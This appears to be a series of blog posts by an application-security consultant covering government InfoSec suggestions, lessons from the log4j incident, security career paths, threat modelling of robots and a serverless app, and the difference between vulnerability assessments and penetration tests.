You may not be aware but Canada’s Public Safety department put out a call to Canadian Citizens (sorry brilliant people who are not Canadian), asking for ideas, suggestions and thoughts on what they should prioritize next for the Canadian Government for InfoSec. I WAS SO EXCITED WHEN I SAW THIS AND WROTE THEM IMMEDIATELY. Obviously I made suggestions about AppSec. You have until August 19, 2022 to send your suggestions. The suggestions that I sent are below.
I would like to see the Canadian Public Service and Government of Canada focus on ensuring we are creating secure software for the public to use. I want to see formal application security programs (sometimes called a secure system development life cycle or S-SDLC) at every department. I have extensive training materials on this topic that I would be happy to provide for free to help.
I would also like to see a government-wide training for all software developers on secure coding, and AppSec training for every person tasked with ensuring the software of their department is secure. When I was in the government (13.5 years), I was never allowed to have security training, because it was too expensive ($7,000 USD for a SANS class was completely out of reach). I was told the government wouldn’t arrange giant classes (say 100 people, splitting the cost of one instructor), because that would be ‘unfair competition with private industry’. You need to fix that, having mostly untrained assets is not a winning strategy. There needs to be a government-wide training initiative to modernize your workforce. (Again, I have free online training that can be accessed here: https://community.wehackpurple.com – join the community (free), then take any courses you want (also free))
Create security policies that apply to all departments, then socialize them (do workshops, create videos, make sure everyone knows – don’t just post them to the TBS website and hope someone notices on their own). A secure coding guideline. An AppSec program/secure SDLC. Incident response, etc. Each department shouldn’t have to start from scratch each time. Then we could have a standardization of what level of security assurance that we expect from each department. I provide some of these policies in the AppSec foundations level 2 course, which is free in the link above.
Throw away all the old policies and procedures that are just not working. 90-day password rotation? Gone. SA&A process that takes several weeks to complete but doesn’t actually offer much in the way of actionable advice? Gone. Re-evaluate current process, get rid of the bad ones. We need agile processes, that let people get their work done. I felt like many of the processes that I had to do in the government were in place because of a lack of trust in the staff’s competency. Instead of not trusting the staff, train them, then trust them. If they continue to screw up after training, discipline them and eventually get rid of the bad apples. Most of your staff is GOOD. Some of them are truly amazing. Treat them with trust and many of them will astound you. Remove onerous administration that is there because you don’t trust them, then let them get their jobs done.
If you have any questions I would love to talk. Thank you for putting out an open call, I’m super-impressed!
I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved (one company estimated 100 weeks of work, completed over the course of 8 days of time) in the response was spectacular, and the damage caused is still unknown at this point. We will likely never know the true extend of the cost of this vulnerability. And this bugs me.
Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.
I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect story telling experience you are used to here, bear with me, please.
Short rehash: log4j is a popular java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar, and if vulnerable, the user would have remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.
Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased my multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….
I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.
I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.
I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…
For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.
I heard several vendors have their customers demand “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore it’s not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….
Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.
Those that had WAF, RASP, or CNDs were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few company’s bacon and reduced the risk greatly.
I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that it is a vulnerability in itself. Log4j proved this, as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly, this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”
Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.
Three years ago I decided that I would share most of my talk content with my community (everything that I am not currently applying to conferences with). At the time, I only shared one, because…. I ran out of time. Now it’s time to share the second talk, “Security is Everybody’s Job!” By “share” I mean give my express permission for anyone, anywhere, to present content that I have written, with no need to pay anything or ask for my consent. You can even charge money to give the talk! Please, just teach people about security.
Me, delivering this talk for the first time, on stage, at DevOpsDays Zurich, in in beautiful Switzerland.
I’ve had a few people ask me why I would do this, and there are a few reasons. * To spread the word about how to secure software; it’s important to me to try to make the internet and other technologies safe to use. * To help new speakers (especially from underrepresented groups). If they have something they can present, with instructions they can follow, hopefully it will help make them more confident and skilled at presenting. * To share knowledge with my community in general: sharing is caring, yo. * The more people who present my talk the more people who may decide to follow me. SO MUCH WIN!
You can give this talk at any IT meetup, especially DevOps, InfoSec or any software development meetup.
Please go forth and teach AppSec! And if you have feedback I want to hear it!
Almost all of the people who respond to my #CyberMentoringMonday tweets each week say that they want to “get into InfoSec” or “become a Penetration Tester”; they rarely choose any other jobs or are more specific than that. I believe the reason for this is that they are not aware of all the different areas within the field of Information Security (InfoSec for short, and “Cyber” for those outside of our industry). I can sympathize; I was in the same position when I joined. I knew three Penetration Testers and lots of Risk Analysts and I had no clue that there were several other areas that may interest me or even existed. I knew I didn’t want to be a Risk Analyst, so I thought the only other option was PenTester. Now I know that is not true at all. This blog post will detail several other areas within the field of Information Security in hopes that newcomers to our field can find their niche more easily. It will not be exhaustive, but I’ll do my best
The above image shows 8 different potential areas within the field of Information Security according to the author, Henry Jiang; Governance, Risk, Career Development, User Education, Standards, Threat Intelligence, Security Architecture and Security Operations.
Since I come from the software development side of IT, and have done almost exclusively coding, my view is going to be extremely biased. With that in mind, the first area you may want to consider is Application Security (AppSec); any and all work towards ensuring that software is secure. This is the field that I work in, so it will have the most detail. There are all sorts of jobs within this field, but the most well-known is the web app pentester (sometimes called an ethical hacker); a person who does security testing on software. Such a person is often a consultant, but can also work in large companies. They test one system, intensively, perform a lot of manual testing, and then move on.
Jobs in Application Security:
Application Security Engineer — you do a mix of all the things listed under AppSec and you are generally a full-time employee. This includes making customer tools, launching a security champion program, writing guidelines, and anything else that will help ensure the security of your organization’s apps. I personally consider this the sweet spot, as I get to do changing and interesting work, and see the security posture improve over time. It is, however, usually a more senior role.
Threat Modeller, working with developers, business representatives and the security team (that’s you in this scenario) to find and document potential threats to your software, then create plans to test for and fix the issues.
Vulnerability Assessment: running lots of scans, all the time, of everything. You can scan the network too. Ideally, you will do more than this, to assess the security of the systems in your care, but it depends on where you work. This position is often an employee position and you tend to have prolonged relationships with the systems and teams you assess.
Vulnerability Management: Keeping Track of the vulnerabilities that all the tools and people find, reporting to management about it, and planning from a higher level. For instance; attempting to wipe out an entire bug class, implementing new tools because you see a deficiency, resource planning, etc. This is an employee position usually, and often a manager role or team lead.
Secure Code Reviewer: reading lots of code, using SAST (static application security testing) tools and SCA (Software Composition Analysis — are our 3rd party components secure?), finding vulnerabilities in written code and helping developers fix it.
DevSecOps Engineer: an AppSec engineer working in a DevOps environment. Same goal, different tactics. Adding security checks to pipelines, figuring out how to secure containers and anything else your DevOps engineers are up to.
Developer Education: this is usually a consultant role, but sometimes for large companies, someone can do this full time. The person teachers the developers to write secure code, the architects to design secure apps, threat modelling, and any other topic they can think of that will help ensure their mandate (secure apps). This person is likely also to training the security champions.
Governance: writing policies, guidelines, standards, etc, to ensure your apps are secure. This job is usually someone that does all the governance stuff for your org and the person is working with the AppSec team to get the details right, OR this person is likely a consultant because this is not an activity that needs to be re-done constantly.
Incident Response: this area includes jobs as an incident manager (you boss everyone around and make sure the incident goes as smoothly as possible), and investigations (Forensics/DFIR). Investigating incidents related to insecure software is a topic I personally find thrilling; detective work is exciting! But with the stress it causes, it’s not for everyone.
Security Testing: often called Penetration Testing, sometimes called Red Teaming, sometimes not officially recognized as a job because management isn’t “ready” to admit they need this yet. This person tests the software (and sometimes networks) to ensure they are secure. This includes manual testing, using lots of tools, and trying to break things without causing a huge mess.
Design Review: This is called a “Security Architect” but AppSec folks are often asked to review designs for potential security flaws. If asked, say yes! It’s super fun and always educational. Bonus; it’s a good way to build trust between security and the developers.
In AppSec you will also be asked to do a range of other things because that’s how life is. Potential asks; install this giant AppSec tool and figure out how it works, create a proof of concept for an exploit to show everyone that it is/is not a problem, create a proof of value with a new AppSec tool we are considering acquiring, get all the developers to log their apps like ‘so’ in order for the SIEM can read the results, research how to do something securely when you have no idea how to do that thing at all, etc. As I said, it’s superfun!
ISACA Victoria, Dec 2019
Security Architect (apps, cloud, network): Security architects ensure that designs are secure. This can mean reviewing a deployment, network or application design, adding recommendations, or even creating the design themselves from scratch. This tends to be a more senior role.
SOC Analyst/Threat Hunter: SOC analysts interpret output from the monitoring tools to try to tell if something bad is happening, while threat hunters go looking for trouble. This is mostly network-based, and I’m not good at networks, otherwise, I would have been all over this when I moved into security. The idea of threat hunting (using data and patterns to spot problems), is very appealing to my metric-adoring brain. Note: SOC Analyst is a junior or intermediate position and threat hunter is not a junior position, but if you want to get into InfoSec they are basically always hiring for SOC Analysts, at almost every company.
Risk Analyst: Evaluate systems to identify and measure risk to the business, then offer recommendations on how to mitigate or when to accept the risks. This tends to be coupled closely with Compliance, and Auditing, which I won’t describe here because I am shamefully under-educated in this area.
Security Policy Writer: Writing policies about security, such as how long network passwords need to be, that all public-facing web apps must be available via HTTPS, and that only TLS 1.2 and higher are acceptable on your network. Deciding, writing, socializing and enforcing these policies are all part of this role.
Malware Analyst/Reverse Engineer: Someone needs to look at malware and figure out how it works, and sometimes people need to write exploits (for legitimate reasons, such as to prove that something is indeed vulnerable, or… You need to ask them). If you enjoy puzzles and really low-level programming (such as ARM, assembler, etc), this job might be for you. But be careful; playing with malware at home is dangerous.
Chief Information Security Officer (CISO or CSO): ‘The boss” of security. This person (hopefully) has a seat at the executive table, directs all security aspects for a company, and is the person held responsible, for better or for worse. If you enjoy running programs, managing things from a high level, and making a big difference, this might be a role for you.
Blue Team/Defender/Security Engineer (enterprise security/implements security tools): The people that keep us safe! These people install tools, run the tools, monitor, patch, and freak out when people download and install things to their desktops without asking. They perform security operations, making sure all the things happen. While those in the SOC (Security operations centre), monitor everything that’s happening and respond when there are problems.
There are many, many, many jobs within the field of Information Security, please feel free to list some of the ones that I missed in the comments below. I hope this information helps more of you join our industry because we need all the help we can get!
Recently someone asked me what the difference was between Applications and Infrastructure. He asked why a Linux operating system wasn’t “software” and I said it was but it’s a perfect copy… I tend to speak about ‘custom software’. We ended up talking for a very long time about it, and I thought a blog post was in order.
Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application, even serverless runs (briefly) on a container. Operating systems are also all standardized, and not unique in nature. For instance, if I’m running SQL server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speak to hardware.
Applications are software that speak to operating systems, databases, APIs and anything else you can think of. There are custom applications (what I’m almost always talking about, software developed for a specific business need or as a product to sell), COTS (configurable off the shelf, like sharepoint or confluence, administered by a person or team, installed locally on a server) and regular old software that you install or access via a web browser that you use as-is (no administration required/simpler). More newly there is SaaS, software as a service, which is basically a great big COTS product, hosted by someone else (no need for you to patch or otherwise take care of it, you pick your settings and use it).
Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing and sometimes downtime is required. This is why so many people say ‘patching is hard’, it is difficult to plan for testing, downtime and to ensure everything will go smoothly.
Software, on the other hand, includes many different components that will be provided prepackaged (such as a new version of a library or a framework) but when you update them sometimes other libraries or framework parts break and/or the custom code that your team wrote can break as well. Meaning you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I’ve heard developers refer to this as “dependency hell”.
If you have just released something brand new, it’s super easy to keep it up to date. Tiny changes present less risk (which is why people love devops over waterfall), making it easier to maintain. But because it’s sparkling and new… Usually management says “hey, please build this new feature, and update that library later”. This is how technical debt accrues. It’s not operational staff or software developers saying ”forget that, I don’t care about this“, it’s almost always conflicting priorities.
Happier times, before I knew anything about log4j.
Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4J java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.
Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…
Although I already posted in my newsletter, on this blog and my youtube channel , I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.
After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.
Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.
You are amazing. Thank you for your service.
Let’s get into some systemic problems.
Inventory: Not just for Netflix Anymore
I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including Web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams who I admire. If they find it hard, how can smaller companies with fewer resources get it done? When responding to this incident this problem has never been more obvious.
Look at past me! No idea what was about to hit her, happily celebrating her new glasses.
Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:
Public Repos that should have been private
Every type of cloud-based version control or code repo you can think of; GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
On-prem, saved to a file server – some with backups and some without
In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
SVN, ClearCase, SourceSafe, subversion and other repos I thought no one was using anymore… That are incompatible with the AppSec tools I (and many others) had at hand.
Having it take over a week just to get access to all the various places the code is kept, meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.
Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.
Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know you’re assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.
We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working folks. This is a systemic problem in our industry.
Lack of Support and Governance for Open-Source Libraries
This may or may not be the biggest issue, but it is certainly the most-talked about throughout this situation. The question posed is most-often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.
Lack of Tooling Coverage
The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS), that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access or has access but the incorrect set of rights? There are dozens are reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.
Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **
But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.
Undeployed Code
This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.
Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?
Lack of Incident Response/Investigation Training
Many people I spoke to who are part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, having no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had near as much training as I would like, with most of what I have learned being from on the job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.
The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….
No Shields
For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery network) like CloudFlare, behind a WAF (Web Application Firewall) or a RASP (Run-Time Application Security Protection).
Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.
Ancient Dependencies
Several teams I advised had what I would call “Ancient Dependencies”; dependencies so old that the application would requiring re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4J is going to take a very, very long time to square away.
Technical debt is security debt.
– Me
Solutions Needed
I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.
For those who do not follow myself or Franziska Bühler, we have an open source project together called OWASP DevSlop in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we’ve learned on our YouTube Channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska’s post OWASP DevSlop’s journey to TLS and Security Headers. If you like this one, read hers too. 🙂
Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episode 2, 2.1 and 2.2. Unfortunately we found out that .Net Core apps don’t have a web.config, so the next time we published it wiped out the beautiful headers we had added. Although that is not good news, it was another chance to learn, and it gave me great excuse to finally write my Security Headers blog post that I have been promising. Here we go!
If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.
The new code for ASP.Net in your web.config looks like this:
I recently had dinner with an old friend, Jesse Hones, the Engineering Manager of Systems / Senior Software Developer of Aprel. I remember when we first met he explained that he designed and programmed robots to measure radio frequencies at extremely precise levels. Fast forward a decade; I am an ethical hacker and he is designing more complex robots than ever before. So I did what anyone would do; I asked him to come on the OWASP DevSlop show and talk about hacking robots.
Jesse Hones and one of his many robots.
His answer was “Not yet. I can’t tell you what all the loopholes are, because I still need those to get my job done.”
Interest piqued.
He explained that previously robot firmware was all custom; each system it’s own unique snowflake. Like custom software is today, ripe with vulnerabilities, however you can only hack them one system at a time. Recently this has changed, he explained, things are standardizing and many use the same components, which all run the same firmware. I asked if this was like Windows XP back in the day, in that almost everyone is running it so when a bug is discovered *every* system is vulnerable. He said yes.
But Jesse is a developer, not a security person, so he looks at it with the “I need to make sure this runs properly” lens, not the “I want to make this robot do my bidding!” viewpoint of an ethical hacker.
More of Jesse’s robots.
Obviously, I had to threat model the situation immediately. Poor Jesse.
Me: What if malware is created that stops production for all affected robots?
Jesse: Yes, this would be costly.
Me: What about ransomware?
Jesse: <unhappy face>
Me: What if someone takes over the robots and has them implant something in every 20th chip it makes to spy on the users? As a supply chain attack?
Jesse: Yes, that would be very bad. However this could change soon; we may be switching over to Windows Embedded.
Me: Okay…. But what if a company used robots Stuxnet style and slowly sabotaged their competitors? So they could never quite finish their R&D on a product? Meanwhile stealing their ideas? Think Stuxnet meets Schindler’s List.
Jesse: …
Me: What if someone uses them to mine bitcoin? Robot Crypto Pirates!
Jesse: I guess tha-
Me: What if robots become the weak point of most networks and are used regularly as pivot points by hackers?
At this point Jesse has resorted to quietly waiting for me to calm down. I look at him.
Me: What if a robot murders someone?
Jesse: That would be the end. The industry could not survive. That cannot be allowed to happen. Ever.
I’d like to define a couple of subjects that seem to be confused often in the industry of application security; Vulnerability Assessment (VA), Vulnerability Scan (VA Scan) and Penetration Test (PenTest). They are often used interchangeably, and the differences do not seem to be well-understood; I have seen this misunderstanding used against many clients who have purchased these services and am hoping clear definitions will help us all.
A Vulnerability Assessment (VA) (sometimes called a security assessment) is an assessment of the security of a system, in attempts to find all possible vulnerabilities. It generally involves using multiple scanning tools, manual exploration and evaluation, as well as examination of all security controls (a lock on a door, a login screen, or input validation are all security controls). The Assessor does not exploit vulnerabilities that are found (for instance they see the door is unlocked, but they do not enter), they just report them, along with information on how to fix each of the vulnerabilities. This sometimes includes a security review of the design and/or threat modelling, questionnaires or interviews, and generally takes days or weeks, not hours or minutes. Sometimes the security assessor will create a proof of concept (POC) to explain a vulnerability with more clarity, but to be clear, that is not the focus of this exercise.
In the past when I was hired to do a penetration test, I would often describe a VA, as if that’s what they wanted, and they would say “yes, do that”. My contract would say “PenTest”, but I would conduct a vulnerability assessment.
In the past I often had requests for “a quick VA” or “VA Scan”, which as it turns out meant “one scan with a vulnerability assessment tool” and no other activities, such a manual investigation of the results. This can be done in as few as a few hours or even minutes if your target is small, and the person performing the task does not need advanced training or skills to perform the task. There are many VA tools on the market; Nessus, Nexpose, OpenVAs and Azure Security Center (for Azure cloud infrastructure only) are all used for scanning infrastructure, while Microsoft Security Risk Detection, Burp Suite, Zed Attack Proxy, NetSparker, Acunetix, AppScan, and App Spider are for scanning web apps. Doing “a quick scan” with any of these tools will net you a list of vulnerabilities, and many of them will be true positives (as opposed to false positives); it is most certainly a worthwhile venture. It is not, however, as thorough as a Vulnerability Assessment or Penetration Test, and there will remain many other issues that are not uncovered if you leave it at that.
I also enjoy infrastructure as code, from time to time
A Penetration Test is another beast entirely. A PenTest seeks to find vulnerabilities and then exploit them, to prove real-world risk. Sometimes penetration tests can cause damage (exploits, if not done very carefully, can leave a mess), and sometimes the scope of a PenTest can call for the tester to collect “trophies” to prove they did the things they claim.
It is very rare that I write an exploit or feel the need to exploit vulnerabilities I find when testing*. Most of the times in my career when I have exploited something everyone just ended up pissed off at me; from the first PenTest I ever did as a sub-contract when I ruined a live prod server and the person that hired me had to explain what happened, to creating proof of concept exploits that embarrass management into doing “the right thing”, to breaking a Drupal CMS site so badly that they had to restore the database AND the app server (Drupal CMS itself was completely unusable) from backup. It’s nice that I impressed people, but I honestly would prefer to spend that extra time helping the developers fix what I have found and re-testing the fixes, rather than showing off whatever talent I have for burning things down.
Special note on ethics: I have seen many consultants who offer these services pass off a quick scan as a full VA or Pentest, charging for 10 days what took them only 1 day to perform. I have also seen many of these same consultants sub-contract this work out to others who they pay less (and with who they share your sensitive data with!), but they do not credit these individuals in the reports or contracts resulting in you having no idea who had access to your systems and data. When writing contracts for such services it would be wise to be explicit in what you are paying for, as well as who will do the work and what information must remain confidential. I am sad to report that I have met many consultants who have bragged about doing these types of (in my opinion) unethical practices. Buyer beware.
I would suggest that performing a proper VA against all of your custom applications as well as large COTS implementations (Customizable Off The Shelf system, such as SharePoint) is a best practice for Enterprise businesses. Not only would you be amazed at the things that you find, (assuming you fix the issues) you will have taken serious measures to avoiding a data breach in the future, as insecure software is still, sadly, the top reason for data breaches (as per the Verizon Breach Reports 2016, 2017, and 2018).
I hope this article helps instill a bit of clarity in our industry.
When I did testing, I did exploit XSS using alert boxes, regularly, because it’s 100% safe to do so. And also blind SQL with timers and errors, but to be clear I am very careful to only perform safe exploits when testing. I can feel myself putting my foot right into my mouth with this note…
I met with my colleague Bryan Hughes the other day to discuss the security of a serverless app he’s creating for JSConf EU (there will be no spoilers about his creation, don’t worry). We had discussed the idea of threat modelling while on a business trip together and he wanted to give it a go. Since I am particularly curious about serverless apps lately thanks to Tal Melamed having dragged me into the OWASP Serverless Top 10 Project, I was excited to have a chance to dive down this rabbit hole.
Bryan’s app’s architecture:
Azure Functions App (MSFT serverless)
JWT tokens for Auth, they will be short-lived
His app will allow other Azure users to call it, with parameters, and it will do something exciting (see? no spoilers!)
Bryan Hughes, South Korea, Demilitarized Zone (DMZ)
Once Bryan has explained what his app would do, he told me his security concerns: who would have access to his app? Could they break into other areas of his Azure Subscription? Exactly what type of authentication token should he use? How would he handle session management? All of which are definitely valid concerns, I was impressed!
We discussed each one of his concerns, and possible technical solutions to mitigate each risk. For instance, use JWTs only to send a random session token value, never a password or sensitive data, and never a number that actually corresponds to something important, such as using someone’s SIN number as their session ID number, that is sensitive info, and an insecure direct object reference. I reminded him that JWTs are encoded, not encrypted, and therefore they were not a secure way to transmit data. Also, I suggested that he create a virtual network around this app (firewalls), just in case someone gets into it, it would mean that they can’t get into the rest of his network and subscription.
Note: RFC 7516 allows for the encryption of JWT tokens, follow the link for more info.
Then we talked about my concerns, which started with a bunch of questions for Bryan about his users and his data.
What data are you asking for from your users? Is any of it sensitive?
He’s asking for their GitHub info, so that he could give them access to call his serverless app so he could grant them access, but that is all. This one piece of data is sensitive info.
Who are your users? What are their motivations to use your app?
The users are conference attendees who want to learn how to call a serverless app like an API, and then make his app do the cool thing that it would do. It’s a learning opportunity, and it’s fun.
Let’s assume you have a malicious user, how could they attack your app?
My first concern was Denial of Service or Brute Force-Style attacks. To avoid these attack vectors he should follow Azure Functions best practices guide, specifically, he should set maxConcurrentRequests to a small number (to avoid a distributed denial-of service), add throttling (slowing down requests to a reasonable speed, which would stop scripted attacks) by enabling the “dynamicThrottlesEnabled” flag, and ideally also set a low number for the maxOutstandingRequests setting, to ensure no one overflows his buffer for requests, which would also result in a denial of service. (Note this is the “A” in CIA: availability)
Other attacks I was concerned about where someone sending malformed requests, in attempt to elicit unexpected behaviour from his app, such as crashing, deleting or modifying data, allowing the user to inject their own code or other potential issues. We discussed using a white list for user input validation and rejecting all requests that were not perfectly formed, or that contained any characters that were not “a-z,A-Z,0–9”. (Note this is an attack on both Integrity and Availability)
The last attack vector I will list here is that users may attempt to access the data itself, the subscription IDs of all the other users (Confidentiality). This was the most important of the risks in this list, as you are the guardian of this data, and if you lose it, and they were to be attacked successfully as a result, this could cause catastrophic reputation damage (to the conference, to him as the creator of the app, to Microsoft as his employer). When I explained this, it became his #1 priority to ensure his users and their data were protected during and after using his system.
Tanya Janca, South Korea, DMZ, 2019
How long are you keeping this data? Where are you storing it? How are you storing it?
Originally Bryan was hoping to avoid using a database together; no data collection means nothing to steal. Although he’s still looking into if that’s a possibility, the plan is to use a database, for now.
He decided he would keep the data until just after the conference was over, and then destroy it all (hence making the risk only a 48~ hour risk). It would be stored in a database (we discussed encryption at rest and in transit, as well as always using parameterized queries, and applying least privilege for the DB user that calls those queries (likely read-only or read/write, but never DBO).
What country is this conference in? Will you be subject to GDPR?
It would be in Europe, and therefore is subject to GDPR. I introduced him to Miriam Wiesner, an MSFT employee with a Pentesting and Security Assessment background, who happens to live in the EU and therefore would have familiarity. I said she would have better advice than I would.
The conversation was about an hour, but I think you get the picture.
The key to serverless is to remember that almost all the same web app vulnerabilities still apply, such as Injection or Denial of Service (DOS) attacks, and that just because there is no server involved, does not mean you do not need to be diligent about the security of your application.
If you want to keep up with Bryan Hughes, and see the results of his project, you can follow him on Dev.TO.
I hope that you found this informal threat model helpful.